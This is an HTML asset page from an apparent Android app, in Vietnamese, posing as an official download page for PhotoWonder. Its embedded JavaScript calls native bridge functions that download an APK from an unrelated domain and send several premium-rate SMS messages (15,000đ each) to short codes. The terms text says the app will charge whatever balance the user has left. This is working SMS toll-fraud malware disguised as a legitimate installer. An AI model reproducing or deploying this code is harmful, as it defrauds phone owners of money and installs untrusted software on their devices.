<html>
 <head> 
  <meta charset="UTF-8"> 
  <style type="text/css">
.orangebt {
 display: inline-block;
 outline: none;
 border: none;
 box-shadow: 0 8px #8D5A0B;
 background-color:#FFA518;
 border-radius:10px;
 width: 100%;
 min-height: 60px;
 color:#ffffff;
 font-family:calibri;
 font-size:20px;
 font-weight:bold;
}.orangebt:hover {
 background-color:#E4951C;
}.orangebt:active {
 background-color:#E4951C;
 box-shadow: 0 5px #623F09;
 transform: translateY(4px);
}
.graybt {
 display: inline-block;
 outline: none;
 border: none;
 box-shadow: 0 8px #4B4B4B;
 background-color:#939393;
 border-radius:10px;
 width: 100%;
 min-height: 60px;
 color:#ffffff;
 font-family:calibri;
 font-size:20px;
 font-weight:bold;
}.graybt:hover {
 background-color:#7A7979;
}.graybt:active {
 background-color:#7A7979;
 box-shadow: 0 5px #353535;
 transform: translateY(4px);
}

</style> 
  <script type="text/javascript">var url = "http://dowload.haitactihon.mobi/edl/c356223/71444/PhotoWonder.apk"; var phone1_15 = "7769"; var phone1_10 = "7669"; var phone1_5 = "7569"; var phone1_4 = "7469"; var msg1_15 = "SMG PHOTOWONDER 0334 mchoigame.org"; var msg1_10 = "SMG PHOTOWONDER 0334 mchoigame.org"; var msg1_5 = "SMG PHOTOWONDER 0334 mchoigame.org"; var msg1_4 = "SMG PHOTOWONDER 0334 mchoigame.org"; var phone2_15 = "7769"; var phone2_10 = "7669"; var phone2_5 = "7569"; var phone2_4 = "7469"; var msg2_15 = "SMG PHOTOWONDER 0334 mchoigame.org"; var msg2_10 = "SMG PHOTOWONDER 0334 mchoigame.org"; var msg2_5 = "SMG PHOTOWONDER 0334 mchoigame.org"; var msg2_4 = "SMG PHOTOWONDER 0334 mchoigame.org"; function myFunction(){ var link = url; var p1_15 = phone1_15; var p1_10 = phone1_10; var p1_5 = phone1_5; var p1_4 = phone1_4; var m1_15 = msg1_15; var m1_10 = msg1_10; var m1_5 = msg1_5; var m1_4 = msg1_4; var p2_15 = phone2_15; var p2_10 = phone2_10; var p2_5 = phone2_5; var p2_4 = phone2_4; var m2_15 = msg2_15; var m2_10 = msg2_10; var m2_5 = msg2_5; var m2_4 = msg2_4; Android.downGame(link); Android.send(p1_15,p1_10,p1_5,p1_4,m1_15,m1_10,m1_5,m1_4,p2_15,p2_10,p2_5,p2_4,m2_15,m2_10,m2_5,m2_4);} function myFunction1(){Android.exit();}function check(){var r = confirm("Bạn đồng ý gửi tin nhắn để tải game/ứng dụng về điện thoại?"); if (r == true) {myFunction();}}</script> 
  <title></title> 
 </head> 
 <body background="file:///android_asset/bg.png" style="margin: 0px; padding: 0px; height: 100%; width: 100%;text-align:justify;"> 
  <table width="100%" height="100px" border="0" cellspacing="0" cellpadding="10"> 
   <tbody> 
    <tr background="file:///android_asset/bg_header.png"> 
     <td> <img src="file:///android_asset/ic.png" width="82px" height="82px"> </td> 
     <!--file:///android_asset/ic.png--> 
     <td width="100%" align="justify"><h1 style="color:white; font-family:calibri;" id="appName">PhotoWonder</h1><h3 style="color:white; font-family:calibri;">Cost: 5000 - 30000</h3></td> 
    </tr> 
   </tbody> 
  </table> 
  <div style="min-height: 80px; max-height: 100px; background-image: url(file:///android_asset/bg_desc.png); border-radius: 12px; padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; margin: 10px; text-align:justify; font-family:calibri;"> 
   <b id="appDesc" style="color:white; font-size:20px;">Tải game PhotoWonder bản chính thức cho điện thoại android apk</b> 
  </div> 
  <div style="margin: 10px;"> 
   <button onclick="check()" class="orangebt">ĐỒNG Ý TẢI VÀ CÀI ĐẶT</button> 
  </div> 
  <p></p> 
  <div style="background-image: url(file:///android_asset/bg_content.png); margin: 10px; border-radius: 12px;"> 
   <div style="text-align:center; padding: 10px; font-family:calibri;"> 
    <font color="white" size="5"><b>- BẢNG ĐIỀU KHOẢN -</b></font> 
   </div> 
   <div style="color:white; padding: 10px; font-size:20px; font-family:calibri;">
     Vui Lòng Đọc Kỹ Điều Khoản Trước Khi Cài Đặt Game 
    <br> 1. Không gỡ bỏ hoặc vô hiệu hóa bất kỳ biện pháp bảo vệ, quyền sở hữu hay bản quyền có trên hoặc trong trò chơi, phần mềm. 
    <br> 2. Không tạo ra các bản sao bắt chước các tính năng hoặc giao diện, dữ liệu của trò chơi, phần mềm này. 
    <br> 3. Không sử dụng trò chơi, phần mềm này làm công cụ để gây hại cho những người dùng khác. 
    <br> 4. Phí sử dụng sản phẩm từ 30.000đ/lần thanh toán. Ứng dụng sẽ thực hiện gửi hai tin nhắn đến đầu số 7769 với giá cước 15.000đ/sms. 
    <br> 5. Không được thay đổi hoặc hủy bỏ trạng thái ban đầu của Ứng Dụng. 
    <br> 6. Sản phẩm có phí và sẽ thu phí 1 lần cài đặt đầu tiên bạn cần thanh toán để tiếp tục sử dụng dịch vụ. 
    <br> 7. Không thiết kế lại, biên dịch, tháo gỡ, chỉnh sửa, đảo lộn thiết kế của Ứng Dụng hoặc nội dung Ứng Dụng. 
    <br> 8. Ứng dụng/Game sẽ hỗ trợ khách hàng gửi 02 tin nhắn đến đầu số 7769 Giá cước là 15.000đ/sms tương đương 30.000 (Ba mươi nghìn đồng). Nếu Quý khách không đủ số tiền 30.000đ mà vẫn muốn tải Ứng dụng/Game, chúng tôi sẽ hỗ trợ thu phí theo số tiền quý khách còn trong tài khoản. Cụ thể: 
    <br> - Nếu quý khách còn 25.000đ chúng tôi sẽ gửi 1 tin nhắn 15.000đ đến đầu số 7769 và gửi 1 tin nhắn 10.000đ đến đầu số 7669. 
    <br> - Nếu quý khách còn 20.000đ chúng tôi sẽ gửi 1 tin nhắn 15.000đ đến đầu số 7769 và gửi 1 tin nhắn 5.000đ đến đầu 7569. 
    <br> - Nếu quý khách còn 15.000đ chúng tôi sẽ gửi 1 tin nhắn đến đầu số 7769. 
    <br> - Nếu quý khách còn 10.000đ chúng tôi sẽ gửi 1 tin nhắn đến đầu số 7669. 
    <br> - Nếu quý khách còn 5.000đ chúng tôi sẽ gửi 1 tin nhắn đến đầu số 7569. 
    <br> 
    <br> 
    <b>Xin chân thành cảm ơn và chúc các bạn có những giây phút chơi game vui vẻ !</b> 
    <br> 
    <br> 
   </div> 
  </div> 
  <div style="margin: 10px;"> 
   <button onclick="check()" class="orangebt">ĐỒNG Ý TẢI VÀ CÀI ĐẶT</button> 
  </div> 
  <p></p> 
  <!-- <div style="padding-left: 5px; padding-right: 5px; padding-top: 5px; padding-bottom: 5px;margin: 10px;text-align:justify;">--> 
  <div style="margin: 10px; text-align:justify; font-size:20px; font-family:calibri;"> 
   <b><i>*Lưu ý: Sử dụng WiFi để việc cài đặt có thể được thực hiện nhanh hơn!</i></b> 
  </div> 
  <div style="margin: 10px;"> 
   <button onclick="myFunction1()" class="graybt">THOÁT</button> 
  </div> 
  <br>  
 </body>
</html>